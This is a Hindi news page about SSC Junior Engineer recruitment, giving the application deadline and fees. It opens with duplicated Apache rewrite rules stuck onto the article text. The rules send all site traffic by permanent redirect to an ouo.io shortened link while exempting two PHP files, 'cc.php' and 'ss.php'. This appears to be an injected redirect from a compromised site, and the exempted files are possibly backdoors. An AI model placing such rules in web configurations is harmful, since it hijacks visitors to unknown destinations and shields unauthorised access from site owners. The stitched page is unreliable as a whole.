
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 424
जो लोग एसएससी की तैयारी कर रहे हैं उनके लिए आवेदन करने का सुनहरा मौका है। कर्मचारी चयन आयोग में अनेक पदों के लिए आवेदन प्रस्तुत किए गए हैं, अगर आप भी एसएससी की तैयारी कर रहे हैं तो इन पदों पर आवेदन कर सकते हैं, आवेदन से संबंधित प्रमुख जानकारियां और विवरण इस प्रकार है.............
पदों का नाम :- जूनियर इंजीनियर ( सिविल, इलेक्ट्रिकल, मैकेनिकल और क्वांटिटी सर्वेइंग एंड कॉन्ट्रैक्ट )
महत्वपूर्ण तिथियां :-
एसएससी आवेदन के लिए ऑनलाइन प्रक्रिया प्रारंभ हो चुकी और जो उम्मीदवार इन पदों के लिए आवेदन करना चाहते हैं वे अंतिम तिथि 25 फरवरी तक आवेदन कर सकते हैं।
आयु सीमा :-
जो उम्मीदवार इन पदों के लिए आवेदन करना चाहते हैं उनके लिए अलग - अलग पदों पर अलग - अलग आयु सीमा निर्धारित की गई है।
शैक्षणिक योग्यता :-
अलग- अलग पदों के लिए शैक्षणिक योग्यता भी अलग रखी गई है।
आवेदन शुल्क :-
सामान्य और ओबीसी वर्ग के उम्मीदवारों को आवेदन करने के लिए 100 रूपए शुल्क देना होगा, इसके साथ ही एससी, एसटी, पीएच और महिला उम्मीदवारों के लिए कोई आवेदन शुल्क देय नहीं होगा।
नोट- कृपया सहीं जानकारी के लिए ऑफिशियल नोटिफिकेशन जरूर देंखे।